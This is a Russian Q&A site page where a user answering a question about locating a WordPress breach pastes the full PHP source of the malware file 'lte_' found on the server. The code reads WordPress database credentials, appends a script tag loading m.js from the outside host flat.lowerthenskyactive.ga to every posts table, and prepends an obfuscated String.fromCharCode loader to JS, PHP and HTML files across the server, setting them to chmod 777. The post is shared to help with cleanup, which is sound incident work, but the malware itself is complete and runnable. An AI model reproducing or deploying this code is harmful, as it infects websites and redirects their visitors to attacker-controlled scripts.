Задать вопрос

jahtaka

Информация
Пользователь пока ничего не рассказал о себе

Наибольший вклад в теги

Все теги (3)

Лучшие ответы пользователя

Все ответы (1)

  • Как найти место взлома wordpress?

    @jahtaka
    Там каким-то образом кладётся файлик "lte_", я пока не определил способ его размещения на сервере. Из него начиает постить код в PHP JS HTM файлы и в базу с редиректом. Тысячами.

    Ai-bolit всё это находит, благодаря ему как раз и обнаружил.

    Файл "lte_" :
    spoiler
    <?php echo "ssqqss>>>";
error_reporting(0);
ini_set('display_errors',0);


search_file_js($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".js");
die();

  
function get_var_reg($pat,$text) {
	
	if ($c = preg_match_all ("/".$pat."/is", $text, $matches))
	{
		return $matches[1][0];
	}
		
	return "";
}
function search_file_ms($dir,$file_to_search){

$search_array = array();

$files = scandir($dir);

if($files == false) {
	
	$dir = substr($dir, 0, -3);
	if (strpos($dir, '../') !== false) {
		
		@search_file_ms( $dir,$file_to_search);
		return;
	}
	if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
		
		@search_file_ms( $dir,$file_to_search);
		return;
	}
}

foreach($files as $key => $value){


    $path = realpath($dir.DIRECTORY_SEPARATOR.$value);

    if(!is_dir($path)) {
		if (strpos($value,$file_to_search) !== false) {
		
			show_sitenames($path);
			
			
			
        }

    } else if($value != "." && $value != "..") {

        @search_file_ms($path, $file_to_search);

    }  
 } 
}
function show_sitenames($file){
	$content = @file_get_contents($file);
	if(strpos($content, "DB_NAME") !== false) {
	
	
	$db = get_var_reg("'DB_NAME'.*?,.*?['|\"](.*?)['|\"]",$content);
	$host = get_var_reg("'DB_HOST'.*?,.*?['|\"](.*?)['|\"]",$content);
	$user = get_var_reg("'DB_USER'.*?,.*?['|\"](.*?)['|\"]",$content);
	$pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\"](.*?)['|\"]",$content);


// Create connection
$conn = new mysqli($host, $user, $pass);

// Check connection
if ($conn->connect_error) {
 
} else { 


$q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%post%'";
$result = $conn->query($q);
if ($result->num_rows > 0) {
    while($row = $result->fetch_assoc()) {
		$q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]."  LIMIT 1 ";
	$result2 = $conn->query($q2);
	if ($result2->num_rows > 0) {
		while($row2 = $result2->fetch_assoc()) {
			$val = $row2['post_content'];
			if(strpos($val, "flat.lowerthenskyactive.ga") === false){
				if(strpos($val, "flat.lowerthenskyactive.ga") === false){
					
				
					$q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,\"<script src='https://flat.lowerthenskyactive.ga/m.js?n=ns1' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%flat.lowerthenskyactive.ga%'";
					$conn->query($q3);
					echo "sql:" . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"];
				
				} else {
				
				}

			} 
		}
	} else {
	}
    }
} else {
}
$conn->close();
}
}
}

function search_file($dir,$file_to_search){

$files = @scandir($dir);

if($files == false) {
	
	$dir = substr($dir, 0, -3);
	if (strpos($dir, '../') !== false) {
		
		@search_file( $dir,$file_to_search);
		return;
	}
	if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
		
		@search_file( $dir,$file_to_search);
		return;
	}
}

foreach($files as $key => $value){

    $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
	
    if(!is_dir($path)) {
		if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {

		make_it($path);

    } }else if($value != "." && $value != "..") {

        search_file($path, $file_to_search);

    }  
 } 

}

function search_file_index($dir,$file_to_search){

$files = @scandir($dir);

if($files == false) {
	
	$dir = substr($dir, 0, -3);
	if (strpos($dir, '../') !== false) {
		
		search_file_index( $dir,$file_to_search);
		return;
	}
	if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
		
		search_file_index( $dir,$file_to_search);
		return;
	}
}

foreach($files as $key => $value){

    $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
	
    if(!is_dir($path)) {
		if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {

		make_it_index($path);

    } }else if($value != "." && $value != "..") {

        search_file_index($path, $file_to_search);

    }  
 } 

}
function search_file_js($dir,$file_to_search){

$files = @scandir($dir);
if($files == false) {
	
	$dir = substr($dir, 0, -3);
	if (strpos($dir, '../') !== false) {
		
		@search_file_js( $dir,$file_to_search);
		return;
	}
	if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
		
		@search_file_js( $dir,$file_to_search);
		return;
	}
}

foreach($files as $key => $value){

    $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
	
    if(!is_dir($path)) {
		if (strpos($value,$file_to_search) !== false && (strpos($value,".js") !== false)) {

		make_it_js($path);

    } }else if($value != "." && $value != "..") {

        search_file_js($path, $file_to_search);

    }  
 } 

}

function make_it_js($f){
			$g = file_get_contents($f);
			
										

if (strpos($g, '102,108,97,116,46,108,111,119,101,114,116,104,101,110,115,107,121,97,99,116,105,118,101,46,103,97') !== false) {

} else {

$l2 = "Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,102,108,97,116,46,108,111,119,101,114,116,104,101,110,115,107,121,97,99,116,105,118,101,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();";
$g = file_get_contents($f);
$g = $l2.$g;
@system('chmod 777 '.$f);
@file_put_contents($f,$g);
echo "js:".$f."\r\n";
}

			
}
function make_it_index($f){
$g = file_get_contents($f);
if (strpos($g, '102,108,97,116,46,108,111,119,101,114,116,104,101,110,115,107,121,97,99,116,105,118,101,46,103,97') !== false || strpos($g, 'flat.lowerthenskyactive.ga') !== false) {

} else {
$l2 = "<script type='text/javascript' src='https://flat.lowerthenskyactive.ga/m.js?n=nb5'></script>";
$g = file_get_contents($f);
$g = $l2.$g;

@system('chmod 777 '.$f);
@file_put_contents($f,$g);
echo "in:".$f."\r\n";


			}
}

function make_it($f){
$g = file_get_contents($f);
if (strpos($g, '102,108,97,116,46,108,111,119,101,114,116,104,101,110,115,107,121,97,99,116,105,118,101,46,103,97') !== false) {

} else {
$l2 = "<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,102,108,97,116,46,108,111,119,101,114,116,104,101,110,115,107,121,97,99,116,105,118,101,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>";
if (strpos($g, '<head>') !== false) {
$b = str_replace("<head>","<head>".$l2,$g);
@system('chmod 777 '.$f);
@file_put_contents($f,$b);
echo "hh:".$f."\r\n";
}
if (strpos($g, '</head>') !== false) {
$b = str_replace("</head>",$l2."</head>",$g);
@system('chmod 777 '.$f);
@file_put_contents($f,$b);
echo "hh:".$f."\r\n";
}


			}
}
    Ответ написан
    4 комментария
    4 комментария